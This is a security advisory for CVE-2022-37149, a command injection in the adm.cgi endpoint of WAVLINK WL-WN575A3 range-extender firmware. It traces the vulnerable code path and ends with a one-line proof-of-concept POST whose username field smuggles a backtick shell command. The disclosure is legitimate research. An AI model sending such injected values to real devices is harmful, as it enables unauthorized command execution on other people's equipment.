Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Information

Vendor of the products:WAVLINK

Reported by: FeiXincheng(FXC030618@outlook.com) && WangJincheng(wjcwinmt@outlook.com) && ShaLetian(ltsha@njupt.edu.cn) from X1cT34m

Affected products:WAVLINK WL-WN575A3

Affected firmware version: RPT75A3.V4300.201217

Vendor Homepage: https://www.wavlink.com/en_us

Vendor Advisory: https://www.wavlink.com/en_us/firmware/details/fac744bd61.html

CVE_ID:CVE-2022-37149

Summarize

WAVLINK WL-WN575A3 was discovered to contain a command injection vulnerability when operate the file adm.cgi. This vulnerability allows attackers to execute arbitrary commands via the username parameter.

Show the product

Wavlink WL-WN575A3 s a AC1200 Dual-band Wi-Fi Range Extender. The test version here is RPT75A3.V4300.201217

image-20220316191407126

Vulnerability details

The vulnerability is detected at /etc_ro/lighttpd/www/cgi-bin/adm.cgi

At first, from the _startentry enters, and then the ftext function is executed.

image-20220316191407126

In the function ftext, we find that we can controll the content of page field is sysinit, we can execute the set_sys_init function.

image-20220316191407126

In the function set_sys_init, the program uses function web_get to obtain the content of parameter username , newpass which are sent by POST request. Then, when newpass!= 0, the content username is formatted into a string passed as an argument to the function do_system which can execute system commands.

image-20220316191407126

image-20220316191407126

poc

Send the following to the URL http://wifi.wavlink.com/cgi-bin/adm.cgi by POST request.

page=sysinit&username=fxc`ls>/etc_ro/lighttpd/www/fxc.html`

Before attack

image-20220316191407126

After attack

image-20220316191407126